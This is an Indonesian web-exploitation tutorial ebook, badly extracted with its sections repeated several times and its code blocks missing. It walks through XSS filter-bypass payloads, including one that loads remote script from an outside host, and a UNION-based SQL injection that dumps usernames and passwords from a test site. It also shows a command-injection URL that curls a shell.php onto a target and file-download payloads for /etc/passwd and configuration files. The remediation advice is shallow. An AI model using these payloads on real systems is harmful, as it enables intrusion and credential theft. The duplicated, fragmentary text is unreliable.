0x07 - Mengarsipkan ExploitMengirim Exploit ke Exploit-DBUntuk mengirim exploit yang telah kita buat ke Exploit-DB kita harus mengirimkan sebuahemail ke pihak Exploit-DB1 submitoffseccom
0x07 - Mengarsipkan ExploitMengirim Exploit ke Packet Storm SecurityUntuk mengirim exploit yang telah kita buat ke Packet Storm Security kita harusmengirimkan sebuah email ke pihak Packet Storm Security1 submissionspacketstormsecuritycom
Demikian yang dapat penulis paparkan mengenai materi yang menjadi pokok bahasandalam ebook ini tentunya masih banyak kekurangan dan kelemahannya
Penulis banyak berharap para pembaca memberikan kritik dan saran yang membangunkepada penulis demi sempurnanya ebook ini dalam penulisan ebook di kesempatan-kesempatan berikutnya Semoga ebook ini berguna bagi para pembaca ebook ini
Terima kasih kepada
0x05 - Local File DownloadApa itu Local File Download Kode yang Menimbulkan Celah Injeksi Local File Download Menutup Celah Local File Download
0x06 - Cross Site Request ForgeryApa itu Cross Site Request Forgery Kode yang Menimbulkan Celah Injeksi Cross Site Request Forgery ~ Kode Exploit Cross Site Request Forgery Menutup Cross Site Request Forgery
0x07 - Mengarsipkan ExploitMembuat Keterangan Exploit untuk Dikirim ~ Contoh Keterangan Exploit Mengirim Exploit ke 1337day Mengirim Exploit ke Exploit-DB Mengirim Exploit ke Packet Storm Security
0x01 - Pengenalan
Apa itu Web ExploitWeb Exploit adalah suatu script atau kode yang menyerang suatu web secara spesifikWeb Exploit digunakan untuk melakukan penetrasi terhadap suatu web secara legalmaupun ilegal untuk mencari suatu kerentanan atau kelemahan (vulnerability) pada suatuweb
Jenis-Jenis Web ExploitWeb Exploit ada beberapa jenis pada kali ini penulis hanya membahas beberapa sajayaitu1 Cross Site Scripting2 SQL Injection3 Remote Code Execution4 Local File Download5 Cross Site Request Forgery
Teknik Mencari Web ExploitAda beberapa teknik untuk mencari sebuah Web Exploit yaitu
1 Analysis Code (Menganalisa Kode)Teknik ini adalah menganalisis secara langsung kode yang ada pada web application Content Management System (CMS) apakah ada kode yang menyebabkan kerentananatau tidak
2 Google Search Engine (Pencarian Google)Teknik ini adalah memanfaatkan Google untuk mencari web exploit denganmemanfaatkan Google Dork
0x02 - Cross Site Scripting
Apa itu Cross Site ScriptingCross Site Scripting merupakan salah satu jenis serangan injeksi code (code injectionattack) dengan memanfaatkan sebuah kode seperti html javascript dan css
Tipe Cross Site Scripting1 Non PersistentCross Site Scripting tipe ini adalah dengan memanfaatkan URL untuk melakukan injeksiContoh http127001xssphpxss=ltscriptgtalert(ldquoXSSrdquo)ltscriptgt
2 Persistent StoredCross Site Scripting tipe ini adalah kode yang kita masukan akan masuk kedalam databaseweb dan akan di load pada sebuah tempat biasanya terdapat di guestbook comment danpost
0x02 - Cross Site Scripting
Kode yang Menimbulkan CelahCross Site Scripting dapat terjadi karena kesalahan dalam sebuah kode dan tidak adanyafilter terhadap kode injeksi Berikut kode yang dapat menimbulkan celah ini
Non Persistent
Jika kita memasukkan parameter xss dan memasukkan kode injeksi html maka akanditampilkan kedalam web
Namun karena pada suatu web itu berbeda kodenya maka bukan hanya seperti itu sajakode yang dapat menimbulkan celah ini Contoh pada CMS MyBB 18
Beda jauh bukan dengan kode diatas tadi Karena beda framework beda kodenya tetapicelahnya tetap sama yaitu tidak adanya filter
Persistent Stored
Tidak jauh beda dengan Non Persistent Celahnya masih terdapat pada parameter
0x02 - Cross Site Scripting
Injeksi Cross Site ScriptingUntuk melakukan injeksi terhadap Cross Site Scripting kita harus memasukan kode injeksipada parameter yang terjadi pada celah ini
Non Persistenthttp127001profilephpname=[Script]
Untuk melakukan injeksi kita akan memasukan kode injeksi pada parameter name
http127001profilephpname=ltscriptgtalert(ldquoXSSrdquo)ltscriptgt
Pada contoh diatas celah ini terdapat pada file profilephp dan pada parameter nameJika kita telah melakukan injeksi terhadap parameter tersebut maka kode akan berubah
Persistent Stored
Dilihat pada gambar diatas untuk menginjeksi celah ini kita memasukan kode injeksi padasebuah form text lalu melakukan submit
0x02 - Cross Site Scripting
Injeksi Cross Site Scripting dengan BypassJika dengan teknik biasa gagal atau terdapat filter terhadap kode kita dapatmenggunakan bypass
Form Searchhttp127001searchphptext=rdquogtltscriptgtalert(ldquoXSSrdquo)ltscriptgtMenambahkan tanda kutip ldquo dan gt untuk melakukan bypass
Image XSShttp127001profilephptxt=ltimg src=javascriptalert(XSS)gtMemanfaatkan kode image untuk melakukan injeksi jika kode yang lainnya di filter
Remote Scripthttp127001profilephpuser=ltscriptsrc=httphackersorgxssjsgtltscriptgtJika fungsi alert documentwrite dan yang lainnya di filter bisa menggunakan RemoteScript iniKode injeksi diisikan pada httphackersorgxssjs
Masih banyak lagi teknik untuk bypass Cross Site Scripting ini jika ingin membaca lebihlanjut silahkan baca di httpswwwowasporgindexphpXSS_Filter_Evasion_Cheat_Sheet
0x02 - Cross Site Scripting
Menutup Celah Cross Site ScriptingUntuk menutup celah ini kita dapat menggunakan fungsi php htmlspecialchars
Non Persistent
Menambahkan fungsi php htmlspecialchars pada parameter name
Persistent Stored
Kode diatas adalah contoh menutupi celah Cross Site Scripting jika kode html terdapatdidalam database dengan menambahkan htmlspecialchars pada kode yangmenampilkan hasil dari load di database
0x03 - SQL Injection
Apa itu SQL InjectionSQL Injection merupakan sebuah teknik dimana seorang penyerang dapat memasukkanperintah-perintah SQL melalui url untuk dieksekusi oleh database Dengan teknikiniseorang penyerang bisa mendapatkan data pada web target
0x03 - SQL Injection
Kode yang Menimbulkan CelahSQL Injection dapat terjadi karena kesalahan dalam sebuah kode query dan tidak adanyafilter terhadap kode injeksi seperti tanda ldquo + order+bydan lain-lain Berikut kode yangdapat menimbulkan celah ini
Jika kita memasukkan injeksi pada parameter id maka akan membuat query SQL padakode diatas berubah
Mengapa bisa berubah
Contoh Jika kita memasukkan kode injeksi pada parameter idhttp127001postphpid=1rsquo+order+by+1rsquo
Query SQL diatas akan berubah menjadi
Maka akan menyebabkan error atau vulnerability pada query SQL
0x03 - SQL Injection
Injeksi SQL InjectionUntuk melakukan injeksi terhadap SQL Injection kita harus memasukan query sql padaparameter yang terjadi pada celah ini Dalam perintah SQL ada dua tipe injeksi yaitustring dan integer String yaitu menggunakan spasi antara url dan query SQL sedangkanInteger menggunakan simbol-simbol seperti +
http127001postphpid=[Query]
Contoh melakukan injeksi SQL terhadap webTarget httptestphpvulnwebcomlistproductsphpcat=
Menghitung Jumlah TablesKita akan memasukkan query sql untuk menghitung jumlah tablesDalam menghitung tables kita akan menggunakan query order+by+jumlah dan harusmendapatkan pesan errorhttptestphpvulnwebcomlistproductsphpcat=1+order+by+1--httptestphpvulnwebcomlistproductsphpcat=1+order+by+2--httptestphpvulnwebcomlistproductsphpcat=1+order+by+3--Query diatas tidak mengakibatkan error sekarang kita coba ganti angka menjadi 12httptestphpvulnwebcomlistproductsphpcat=1+order+by+12--
Muncul pesan error pada pencarian tables ini angka 12 tadi kita kurang 1 (12 - 1 = 11)maka menjadi 11 itu berarti tables yang ada pada web ada 11
0x03 - SQL Injection
Injeksi SQL Injection
Melihat TablesKita akan memasukkan query sql untuk melihat tables yang adaDalam melihat tables kita akan menggunakan query group_concat(table_name) dan+from+information_schematables+where+table_schema=database()
httptestphpvulnwebcomlistproductsphpcat=-1+union+select+123456group_concat(table_name)891011+from+information_schematables+where+table_schema=database()
Maka akan muncul tables yang ada
Tables 1 Artists2 Carts3 Categ4 Featured5 Guestbook6 Pictures7 Products8 Users
0x03 - SQL Injection
Injeksi SQL Injection
Melihat ColumnKita akan memasukkan query sql untuk melihat column yang adaDalam melihat column kita akan menggunakan query group_concat(column_name)dan+from+information_schemacolumns+where+table_name=CHAR(Table_Decimal)
Sebelum melihat column kita harus merubah nama tables dari string menjadi decimalPada kali ini penulis menggunakan tables usersString users gt Decimal 117115101114115
httptestphpvulnwebcomlistproductsphpcat=-1+union+select+123456group_concat(column_name)891011+from+information_schemacolumns+where+table_name=CHAR(117115101114115)--
Maka akan muncul column yang ada
Column 1 Uname 7 Phone2 Pass 8 Cart3 Cc4 Address5 Email6 Name
0x03 - SQL Injection
Injeksi SQL Injection
Melihat Data dari ColumnKita akan memasukkan query sql untuk melihat data pada column yang adaDalam melihat data column kita akan menggunakan group_concat(nama_column) dan+from+[nama_table]--
Pada kali ini kita akan melihat data pada tables users dan pada column uname amp passhttptestphpvulnwebcomlistproductsphpcat=-1+union+select+123456group_concat(uname0x3apass)891011+from+users--
Maka akan muncul data pada column tersebut
Data Column Uname testPass test
0x03 - SQL Injection
Menutup Celah SQL InjectionUntuk menutup celah ini kita dapat menggunakan fungsi mysql_real_escape_stringpada parameter untuk melakukan filterasi
Menambahkan fungsi mysql_real_escape_string pada parameter id
Dengan fungsi diatas kode injeksi seperti 1rsquo+order+by+1 akan diabaikan oleh query
0x04 - Remote Code Execution
Apa itu Remote Code ExecutionRemote Command Execution adalah sebuah celah yang membuat kita terhubung padasebuah command atau terminal sistem operasi server atau hosting web tersebut Dengancelah ini kita dapat menggunakan perintah-perintah yang ada pada sistem operasi servertersebut
0x04 - Remote Code Execution
Kode yang Menimbulkan CelahRemote Code Execution dapat terjadi karena kesalahan dalam sebuah kode dan tidakadanya filter terhadap kode injeksi yang berbahaya seperti wget curl cat dan lain-lainBerikut kode yang dapat menimbulkan celah ini
Kode diatas akan menjalankan perintah dan memunculkan output(hasil dari kerja perintah)dari parameter cmd
Namun selain kode diatas ada juga kode seperti ini yang dapat menimbulakan celah
Kode diatas akan menjalankan perintah atau mengeksekusi perintah tanpa mengeluarkanoutput dari parameter cmd namun perintah tetap berjalan atau dieksekusi
0x04 - Remote Code Execution
Injeksi Remote Code ExecutionUntuk melakukan injeksi terhadap Remote Code Execution kita harus memasukan kodeinjeksi atau perintah sistem operasi (operating system) pada parameter yang ada padacelah ini
http127001cmdphpcmd=[Perintah]
Pada celah ini kita dapat menggunakan perintah sistem operasi tetapi tergantung dariserver jika server menggunakan sistem operasi windows maka perintah yang digunakanadalah perintah di windows begitu juga dengan server yang menggunakan sistem operasilinux maka akan menggunakan perintah linux
Contoh perintah untuk download file dari server lain dan menyimpannya di web targethttp127001cmdphpcmd=curl -o httpgooglecomshellphp
Perintah diatas menggunakan cURL untuk download file dari server lain
Namun bukan hanya itu saja masih banyak yang dapat dilakukan melalui celah ini antaralain1 Membuat File2 Menghapus File3 Mengcopy File4 Mengedit File5 Melihat File etcpasswd
Dan masih banyak lagi
0x04 - Remote Code Execution
Menutup Celah Remote Code ExecutionUntuk menutup celah ini kita dapat menggunakan if switch case pada kode php
Pada kode diatas kita membatasi penggunaan perintah jadi hanya perintah yang telahkita tentukan saja yang dapat berfungsi seperti perintah netstat dan ifconfig
0x05 - Local File Download
Apa itu Local File DownloadLocal File Download merupakan sebuah teknik dimana seorang penyerang dapatmendownload file-file yang ada pada web target
0x05 - Local File Download
Kode yang Menimbulkan CelahLocal File Download dapat terjadi karena kesalahan dalam sebuah kode dan tidak ada filterdalam mendownload file
Contoh kode
Kode diatas akan mendownload file yang di input dari parameter file
Selain kode diatas ada juga kode yang menimbulkan celah seperti kode dibawah ini
Kode diatas akan mendownload file yang di input dari parameter downloadfile
0x05 - Local File Download
Injeksi Local File DownloadUntuk melakukan injeksi terhadap Local File Download kita hanya perlu memasukkannama file yang ingin di download
http127001filephpdownload=[File]
Contoh InjeksiJika kita ingin mendownload file configurationphp dari sebuah web
http127001filephpdownload=configurationphp
Namun kita bukan hanya bisa download file yang ada didalam web tetapi didalam serverjuga bisa
Contoh InjeksiJika kita ingin mendownload file etcpasswd untuk melihat users yang ada pada server
http127001filephpdownload=etcpasswd
0x05 - Local File Download
Menutup Celah Local File DownloadUntuk menutup celah Local File Download kita dapat menggunakan fungsi if strpos padakode php
Kode diatas akan membatasi atau filter kode injeksi seperti etcpasswd danconfigurationphp pada parameter file
0x06 - Cross Site Request Forgery
Apa itu Cross Site Request ForgeryCross Site Request Forgery merupakan teknik pemalsuan permintaan yang berasal darihalaman web atau situs yang berbeda Cross Site Request Forgery biasanya terjadi padahalaman admin sebuah web
0x06 - Cross Site Request Forgery
Kode yang Menimbulkan CelahCross Site Request Forgery dapat terjadi karena kesalahan dalam sebuah kode dan tidakadanya session dalam sebuah kode
Contoh Misalkan terjadi pada file administratorpostphp dan file tersebut berisi kode sepertidibawah ini
Kode diatas dapat melakukan penambahan data pada database Terlihat jelas bahwa userbiasa dapat menambahkan data jika user tersebut mengetahui parameter post karenatidak adanya sebuah session
0x06 - Cross Site Request Forgery
Injeksi Cross Site Request ForgeryUntuk melakukan injeksi terhadap Cross Site Request Forgery kita harus memasukankode injeksi dan membutuhkan sebuah kode dan mengetahui parameter pada web target
Kode Exploit Cross Site Request ForgeryPada celah ini kita membutuhkan sebuah kode untuk melakukan injeksi
Contoh Jika Cross Site Request Forgery terjadi pada httpgooglecomadministratorpostphpdan terdapat pada parameter post dan name
Berikut isi kode dari httpgooglecomadministratorpostphp
Jadi kita akan membuat sebuah kode yang melakukan penyerangan ke parameter postdan name
Berikut contoh kode
Kode tersebut akan menjadi seperti ini
Lalu tinggal melakukan submit pada data yang telah di input pada form text tersebut
0x06 - Cross Site Request Forgery
Menutup Celah Cross Site Request ForgeryUntuk menutup celah ini kita hanya perlu menambahkan session pada kode php
Contoh kode
Dari kode diatas kita menambahkan fungsi session_start() dan $_SESSION pada kodeKode tersebut berfungsi untuk melakukan pemeriksaan session Jika username bukanadmin maka posting gagal
0x07 - Mengarsipkan Exploit
Membuat Keterangan Exploit untuk DikirimSetelah kita selesai menganalisis kode dan menemukan sebuah celah (vulnerability) padasuatu Content Management System (CMS) kini saatnya kita membuat keteranganmengenai exploit kita untuk diarsipkan ke beberapa exploit archive seperti 1337dayExploit-DB dan Packet Storm Security
Dalam membuat exploit kita harus memberikan keterangan seperti Title Author DateFound Version Category Vendor Tested on Vulnerability dan POC
0x07 - Mengarsipkan ExploitMembuat Keterangan Exploit untuk Dikirim
Contoh Keterangan ExploitBerikut adalah contoh dalam membuat keterangan exploit
Dalam membuat keterangan exploit jangan lupa memberikan keterangan POC yangsangat jelas
0x07 - Mengarsipkan ExploitMengirim Exploit ke 1337dayUntuk mengirim exploit yang telah kita buat ke 1337day kita harus mengirimkan sebuahemail ke pihak 1337day1 admin1337daycom2 mrinj3ct0rgmailcom
0x07 - Mengarsipkan ExploitMengirim Exploit ke Exploit-DBUntuk mengirim exploit yang telah kita buat ke Exploit-DB kita harus mengirimkan sebuahemail ke pihak Exploit-DB1 submitoffseccom
0x07 - Mengarsipkan ExploitMengirim Exploit ke Packet Storm SecurityUntuk mengirim exploit yang telah kita buat ke Packet Storm Security kita harusmengirimkan sebuah email ke pihak Packet Storm Security1 submissionspacketstormsecuritycom
Demikian yang dapat penulis paparkan mengenai materi yang menjadi pokok bahasandalam ebook ini tentunya masih banyak kekurangan dan kelemahannya
Penulis banyak berharap para pembaca memberikan kritik dan saran yang membangunkepada penulis demi sempurnanya ebook ini dalam penulisan ebook di kesempatan-kesempatan berikutnya Semoga ebook ini berguna bagi para pembaca ebook ini
Terima kasih kepada
0x01 - Pengenalan
Apa itu Web ExploitWeb Exploit adalah suatu script atau kode yang menyerang suatu web secara spesifikWeb Exploit digunakan untuk melakukan penetrasi terhadap suatu web secara legalmaupun ilegal untuk mencari suatu kerentanan atau kelemahan (vulnerability) pada suatuweb
Jenis-Jenis Web ExploitWeb Exploit ada beberapa jenis pada kali ini penulis hanya membahas beberapa sajayaitu1 Cross Site Scripting2 SQL Injection3 Remote Code Execution4 Local File Download5 Cross Site Request Forgery
Teknik Mencari Web ExploitAda beberapa teknik untuk mencari sebuah Web Exploit yaitu
1 Analysis Code (Menganalisa Kode)Teknik ini adalah menganalisis secara langsung kode yang ada pada web application Content Management System (CMS) apakah ada kode yang menyebabkan kerentananatau tidak
2 Google Search Engine (Pencarian Google)Teknik ini adalah memanfaatkan Google untuk mencari web exploit denganmemanfaatkan Google Dork
0x02 - Cross Site Scripting
Apa itu Cross Site ScriptingCross Site Scripting merupakan salah satu jenis serangan injeksi code (code injectionattack) dengan memanfaatkan sebuah kode seperti html javascript dan css
Tipe Cross Site Scripting1 Non PersistentCross Site Scripting tipe ini adalah dengan memanfaatkan URL untuk melakukan injeksiContoh http127001xssphpxss=ltscriptgtalert(ldquoXSSrdquo)ltscriptgt
2 Persistent StoredCross Site Scripting tipe ini adalah kode yang kita masukan akan masuk kedalam databaseweb dan akan di load pada sebuah tempat biasanya terdapat di guestbook comment danpost
0x02 - Cross Site Scripting
Kode yang Menimbulkan CelahCross Site Scripting dapat terjadi karena kesalahan dalam sebuah kode dan tidak adanyafilter terhadap kode injeksi Berikut kode yang dapat menimbulkan celah ini
Non Persistent
Jika kita memasukkan parameter xss dan memasukkan kode injeksi html maka akanditampilkan kedalam web
Namun karena pada suatu web itu berbeda kodenya maka bukan hanya seperti itu sajakode yang dapat menimbulkan celah ini Contoh pada CMS MyBB 18
Beda jauh bukan dengan kode diatas tadi Karena beda framework beda kodenya tetapicelahnya tetap sama yaitu tidak adanya filter
Persistent Stored
Tidak jauh beda dengan Non Persistent Celahnya masih terdapat pada parameter
0x02 - Cross Site Scripting
Injeksi Cross Site ScriptingUntuk melakukan injeksi terhadap Cross Site Scripting kita harus memasukan kode injeksipada parameter yang terjadi pada celah ini
Non Persistenthttp127001profilephpname=[Script]
Untuk melakukan injeksi kita akan memasukan kode injeksi pada parameter name
http127001profilephpname=ltscriptgtalert(ldquoXSSrdquo)ltscriptgt
Pada contoh diatas celah ini terdapat pada file profilephp dan pada parameter nameJika kita telah melakukan injeksi terhadap parameter tersebut maka kode akan berubah
Persistent Stored
Dilihat pada gambar diatas untuk menginjeksi celah ini kita memasukan kode injeksi padasebuah form text lalu melakukan submit
0x02 - Cross Site Scripting
Injeksi Cross Site Scripting dengan BypassJika dengan teknik biasa gagal atau terdapat filter terhadap kode kita dapatmenggunakan bypass
Form Searchhttp127001searchphptext=rdquogtltscriptgtalert(ldquoXSSrdquo)ltscriptgtMenambahkan tanda kutip ldquo dan gt untuk melakukan bypass
Image XSShttp127001profilephptxt=ltimg src=javascriptalert(XSS)gtMemanfaatkan kode image untuk melakukan injeksi jika kode yang lainnya di filter
Remote Scripthttp127001profilephpuser=ltscriptsrc=httphackersorgxssjsgtltscriptgtJika fungsi alert documentwrite dan yang lainnya di filter bisa menggunakan RemoteScript iniKode injeksi diisikan pada httphackersorgxssjs
Masih banyak lagi teknik untuk bypass Cross Site Scripting ini jika ingin membaca lebihlanjut silahkan baca di httpswwwowasporgindexphpXSS_Filter_Evasion_Cheat_Sheet
0x02 - Cross Site Scripting
Menutup Celah Cross Site ScriptingUntuk menutup celah ini kita dapat menggunakan fungsi php htmlspecialchars
Non Persistent
Menambahkan fungsi php htmlspecialchars pada parameter name
Persistent Stored
Kode diatas adalah contoh menutupi celah Cross Site Scripting jika kode html terdapatdidalam database dengan menambahkan htmlspecialchars pada kode yangmenampilkan hasil dari load di database
0x03 - SQL Injection
Apa itu SQL InjectionSQL Injection merupakan sebuah teknik dimana seorang penyerang dapat memasukkanperintah-perintah SQL melalui url untuk dieksekusi oleh database Dengan teknikiniseorang penyerang bisa mendapatkan data pada web target
0x03 - SQL Injection
Kode yang Menimbulkan CelahSQL Injection dapat terjadi karena kesalahan dalam sebuah kode query dan tidak adanyafilter terhadap kode injeksi seperti tanda ldquo + order+bydan lain-lain Berikut kode yangdapat menimbulkan celah ini
Jika kita memasukkan injeksi pada parameter id maka akan membuat query SQL padakode diatas berubah
Mengapa bisa berubah
Contoh Jika kita memasukkan kode injeksi pada parameter idhttp127001postphpid=1rsquo+order+by+1rsquo
Query SQL diatas akan berubah menjadi
Maka akan menyebabkan error atau vulnerability pada query SQL
0x03 - SQL Injection
Injeksi SQL InjectionUntuk melakukan injeksi terhadap SQL Injection kita harus memasukan query sql padaparameter yang terjadi pada celah ini Dalam perintah SQL ada dua tipe injeksi yaitustring dan integer String yaitu menggunakan spasi antara url dan query SQL sedangkanInteger menggunakan simbol-simbol seperti +
http127001postphpid=[Query]
Contoh melakukan injeksi SQL terhadap webTarget httptestphpvulnwebcomlistproductsphpcat=
Menghitung Jumlah TablesKita akan memasukkan query sql untuk menghitung jumlah tablesDalam menghitung tables kita akan menggunakan query order+by+jumlah dan harusmendapatkan pesan errorhttptestphpvulnwebcomlistproductsphpcat=1+order+by+1--httptestphpvulnwebcomlistproductsphpcat=1+order+by+2--httptestphpvulnwebcomlistproductsphpcat=1+order+by+3--Query diatas tidak mengakibatkan error sekarang kita coba ganti angka menjadi 12httptestphpvulnwebcomlistproductsphpcat=1+order+by+12--
Muncul pesan error pada pencarian tables ini angka 12 tadi kita kurang 1 (12 - 1 = 11)maka menjadi 11 itu berarti tables yang ada pada web ada 11
0x03 - SQL Injection
Injeksi SQL Injection
Melihat TablesKita akan memasukkan query sql untuk melihat tables yang adaDalam melihat tables kita akan menggunakan query group_concat(table_name) dan+from+information_schematables+where+table_schema=database()
httptestphpvulnwebcomlistproductsphpcat=-1+union+select+123456group_concat(table_name)891011+from+information_schematables+where+table_schema=database()
Maka akan muncul tables yang ada
Tables 1 Artists2 Carts3 Categ4 Featured5 Guestbook6 Pictures7 Products8 Users
0x03 - SQL Injection
Injeksi SQL Injection
Melihat ColumnKita akan memasukkan query sql untuk melihat column yang adaDalam melihat column kita akan menggunakan query group_concat(column_name)dan+from+information_schemacolumns+where+table_name=CHAR(Table_Decimal)
Sebelum melihat column kita harus merubah nama tables dari string menjadi decimalPada kali ini penulis menggunakan tables usersString users gt Decimal 117115101114115
httptestphpvulnwebcomlistproductsphpcat=-1+union+select+123456group_concat(column_name)891011+from+information_schemacolumns+where+table_name=CHAR(117115101114115)--
Maka akan muncul column yang ada
Column 1 Uname 7 Phone2 Pass 8 Cart3 Cc4 Address5 Email6 Name
0x03 - SQL Injection
Injeksi SQL Injection
Melihat Data dari ColumnKita akan memasukkan query sql untuk melihat data pada column yang adaDalam melihat data column kita akan menggunakan group_concat(nama_column) dan+from+[nama_table]--
Pada kali ini kita akan melihat data pada tables users dan pada column uname amp passhttptestphpvulnwebcomlistproductsphpcat=-1+union+select+123456group_concat(uname0x3apass)891011+from+users--
Maka akan muncul data pada column tersebut
Data Column Uname testPass test
0x03 - SQL Injection
Menutup Celah SQL InjectionUntuk menutup celah ini kita dapat menggunakan fungsi mysql_real_escape_stringpada parameter untuk melakukan filterasi
Menambahkan fungsi mysql_real_escape_string pada parameter id
Dengan fungsi diatas kode injeksi seperti 1rsquo+order+by+1 akan diabaikan oleh query
0x04 - Remote Code Execution
Apa itu Remote Code ExecutionRemote Command Execution adalah sebuah celah yang membuat kita terhubung padasebuah command atau terminal sistem operasi server atau hosting web tersebut Dengancelah ini kita dapat menggunakan perintah-perintah yang ada pada sistem operasi servertersebut
0x04 - Remote Code Execution
Kode yang Menimbulkan CelahRemote Code Execution dapat terjadi karena kesalahan dalam sebuah kode dan tidakadanya filter terhadap kode injeksi yang berbahaya seperti wget curl cat dan lain-lainBerikut kode yang dapat menimbulkan celah ini
Kode diatas akan menjalankan perintah dan memunculkan output(hasil dari kerja perintah)dari parameter cmd
Namun selain kode diatas ada juga kode seperti ini yang dapat menimbulakan celah
Kode diatas akan menjalankan perintah atau mengeksekusi perintah tanpa mengeluarkanoutput dari parameter cmd namun perintah tetap berjalan atau dieksekusi
0x04 - Remote Code Execution
Injeksi Remote Code ExecutionUntuk melakukan injeksi terhadap Remote Code Execution kita harus memasukan kodeinjeksi atau perintah sistem operasi (operating system) pada parameter yang ada padacelah ini
http127001cmdphpcmd=[Perintah]
Pada celah ini kita dapat menggunakan perintah sistem operasi tetapi tergantung dariserver jika server menggunakan sistem operasi windows maka perintah yang digunakanadalah perintah di windows begitu juga dengan server yang menggunakan sistem operasilinux maka akan menggunakan perintah linux
Contoh perintah untuk download file dari server lain dan menyimpannya di web targethttp127001cmdphpcmd=curl -o httpgooglecomshellphp
Perintah diatas menggunakan cURL untuk download file dari server lain
Namun bukan hanya itu saja masih banyak yang dapat dilakukan melalui celah ini antaralain1 Membuat File2 Menghapus File3 Mengcopy File4 Mengedit File5 Melihat File etcpasswd
Dan masih banyak lagi
0x04 - Remote Code Execution
Menutup Celah Remote Code ExecutionUntuk menutup celah ini kita dapat menggunakan if switch case pada kode php
Pada kode diatas kita membatasi penggunaan perintah jadi hanya perintah yang telahkita tentukan saja yang dapat berfungsi seperti perintah netstat dan ifconfig
0x05 - Local File Download
Apa itu Local File DownloadLocal File Download merupakan sebuah teknik dimana seorang penyerang dapatmendownload file-file yang ada pada web target
0x05 - Local File Download
Kode yang Menimbulkan CelahLocal File Download dapat terjadi karena kesalahan dalam sebuah kode dan tidak ada filterdalam mendownload file
Contoh kode
Kode diatas akan mendownload file yang di input dari parameter file
Selain kode diatas ada juga kode yang menimbulkan celah seperti kode dibawah ini
Kode diatas akan mendownload file yang di input dari parameter downloadfile
0x05 - Local File Download
Injeksi Local File DownloadUntuk melakukan injeksi terhadap Local File Download kita hanya perlu memasukkannama file yang ingin di download
http127001filephpdownload=[File]
Contoh InjeksiJika kita ingin mendownload file configurationphp dari sebuah web
http127001filephpdownload=configurationphp
Namun kita bukan hanya bisa download file yang ada didalam web tetapi didalam serverjuga bisa
Contoh InjeksiJika kita ingin mendownload file etcpasswd untuk melihat users yang ada pada server
http127001filephpdownload=etcpasswd
0x05 - Local File Download
Menutup Celah Local File DownloadUntuk menutup celah Local File Download kita dapat menggunakan fungsi if strpos padakode php
Kode diatas akan membatasi atau filter kode injeksi seperti etcpasswd danconfigurationphp pada parameter file
0x06 - Cross Site Request Forgery
Apa itu Cross Site Request ForgeryCross Site Request Forgery merupakan teknik pemalsuan permintaan yang berasal darihalaman web atau situs yang berbeda Cross Site Request Forgery biasanya terjadi padahalaman admin sebuah web
0x06 - Cross Site Request Forgery
Kode yang Menimbulkan CelahCross Site Request Forgery dapat terjadi karena kesalahan dalam sebuah kode dan tidakadanya session dalam sebuah kode
Contoh Misalkan terjadi pada file administratorpostphp dan file tersebut berisi kode sepertidibawah ini
Kode diatas dapat melakukan penambahan data pada database Terlihat jelas bahwa userbiasa dapat menambahkan data jika user tersebut mengetahui parameter post karenatidak adanya sebuah session
0x06 - Cross Site Request Forgery
Injeksi Cross Site Request ForgeryUntuk melakukan injeksi terhadap Cross Site Request Forgery kita harus memasukankode injeksi dan membutuhkan sebuah kode dan mengetahui parameter pada web target
Kode Exploit Cross Site Request ForgeryPada celah ini kita membutuhkan sebuah kode untuk melakukan injeksi
Contoh Jika Cross Site Request Forgery terjadi pada httpgooglecomadministratorpostphpdan terdapat pada parameter post dan name
Berikut isi kode dari httpgooglecomadministratorpostphp
Jadi kita akan membuat sebuah kode yang melakukan penyerangan ke parameter postdan name
Berikut contoh kode
Kode tersebut akan menjadi seperti ini
Lalu tinggal melakukan submit pada data yang telah di input pada form text tersebut
0x06 - Cross Site Request Forgery
Menutup Celah Cross Site Request ForgeryUntuk menutup celah ini kita hanya perlu menambahkan session pada kode php
Contoh kode
Dari kode diatas kita menambahkan fungsi session_start() dan $_SESSION pada kodeKode tersebut berfungsi untuk melakukan pemeriksaan session Jika username bukanadmin maka posting gagal
0x07 - Mengarsipkan Exploit
Membuat Keterangan Exploit untuk DikirimSetelah kita selesai menganalisis kode dan menemukan sebuah celah (vulnerability) padasuatu Content Management System (CMS) kini saatnya kita membuat keteranganmengenai exploit kita untuk diarsipkan ke beberapa exploit archive seperti 1337dayExploit-DB dan Packet Storm Security
Dalam membuat exploit kita harus memberikan keterangan seperti Title Author DateFound Version Category Vendor Tested on Vulnerability dan POC
0x07 - Mengarsipkan ExploitMembuat Keterangan Exploit untuk Dikirim
Contoh Keterangan ExploitBerikut adalah contoh dalam membuat keterangan exploit
Dalam membuat keterangan exploit jangan lupa memberikan keterangan POC yangsangat jelas
0x07 - Mengarsipkan ExploitMengirim Exploit ke 1337dayUntuk mengirim exploit yang telah kita buat ke 1337day kita harus mengirimkan sebuahemail ke pihak 1337day1 admin1337daycom2 mrinj3ct0rgmailcom
0x07 - Mengarsipkan ExploitMengirim Exploit ke Exploit-DBUntuk mengirim exploit yang telah kita buat ke Exploit-DB kita harus mengirimkan sebuahemail ke pihak Exploit-DB1 submitoffseccom
0x07 - Mengarsipkan ExploitMengirim Exploit ke Packet Storm SecurityUntuk mengirim exploit yang telah kita buat ke Packet Storm Security kita harusmengirimkan sebuah email ke pihak Packet Storm Security1 submissionspacketstormsecuritycom
Demikian yang dapat penulis paparkan mengenai materi yang menjadi pokok bahasandalam ebook ini tentunya masih banyak kekurangan dan kelemahannya
Penulis banyak berharap para pembaca memberikan kritik dan saran yang membangunkepada penulis demi sempurnanya ebook ini dalam penulisan ebook di kesempatan-kesempatan berikutnya Semoga ebook ini berguna bagi para pembaca ebook ini
Terima kasih kepada
0x02 - Cross Site Scripting
Apa itu Cross Site ScriptingCross Site Scripting merupakan salah satu jenis serangan injeksi code (code injectionattack) dengan memanfaatkan sebuah kode seperti html javascript dan css
Tipe Cross Site Scripting1 Non PersistentCross Site Scripting tipe ini adalah dengan memanfaatkan URL untuk melakukan injeksiContoh http127001xssphpxss=ltscriptgtalert(ldquoXSSrdquo)ltscriptgt
2 Persistent StoredCross Site Scripting tipe ini adalah kode yang kita masukan akan masuk kedalam databaseweb dan akan di load pada sebuah tempat biasanya terdapat di guestbook comment danpost
0x02 - Cross Site Scripting
Kode yang Menimbulkan CelahCross Site Scripting dapat terjadi karena kesalahan dalam sebuah kode dan tidak adanyafilter terhadap kode injeksi Berikut kode yang dapat menimbulkan celah ini
Non Persistent
Jika kita memasukkan parameter xss dan memasukkan kode injeksi html maka akanditampilkan kedalam web
Namun karena pada suatu web itu berbeda kodenya maka bukan hanya seperti itu sajakode yang dapat menimbulkan celah ini Contoh pada CMS MyBB 18
